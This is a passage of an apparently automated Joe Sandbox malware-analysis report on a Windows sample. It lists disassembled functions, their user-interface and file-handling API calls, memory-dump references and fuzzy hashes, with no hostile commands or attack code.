                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3869813825-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00458EAB Relevance: 25.6, APIs: 17, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00458EBF
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00458ECB
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00458ED7
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00458EE3
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00458EEF
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00458EFB
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00458F07
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00458F13
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00458F1F
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00458F2B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00458F37
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00458F43
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00458F4F
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00458F5B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00458F67
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00458F73
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorInfo.USER32(?), ref: 00458F83
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2577412497-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: df8496a5ccf8980c413cee1492e9511dd2a8cf50dccd45c320fbb6698c2849a1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d9ac11be0830284379e84a8ce80867a77d5222e4d8acd5552d2ffd66ae6e186d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df8496a5ccf8980c413cee1492e9511dd2a8cf50dccd45c320fbb6698c2849a1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54314471E4831966EB509FB59C0AB9FBFA0EF40750F10452BE648BF2C0DEB964408BD5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464B28
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464C28
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464CBA
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464CD0
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464CEF
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$Directory$CurrentSystem
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1914653954-2746444292
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045CE8B
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045CE9E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0045CF61
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1153243558-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00470E96 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 00470EC0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00441672: ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00441672: GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00441672: PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 00470F32
                                                                                                                                                                                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00470F3B
                                                                                                                                                                                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00470F65
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00470FA2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00470FB7
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00470FC9
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00470FD7
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00470FF4
                                                                                                                                                                                                                                                                                                                                                                                                                                • DragFinish.SHELL32(?), ref: 00470FFA
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 004710E2
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4085615965-3440237614
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d46f0dc6a402942f8e7c2c56388383e1fbb47624789ac98c9c2308d24ef9fef1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4ea733558c9692989c64ea5f36e42be92b13a76634dc251051ad4f24abf1ae27
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d46f0dc6a402942f8e7c2c56388383e1fbb47624789ac98c9c2308d24ef9fef1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 076190716043019FD310EF65CC85E9FB7A8FFC9704F104A2EF59497291DB74AA098BAA
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3832890014-4202584635
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 0046A0DD
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$CtrlFocus
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1534620443-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
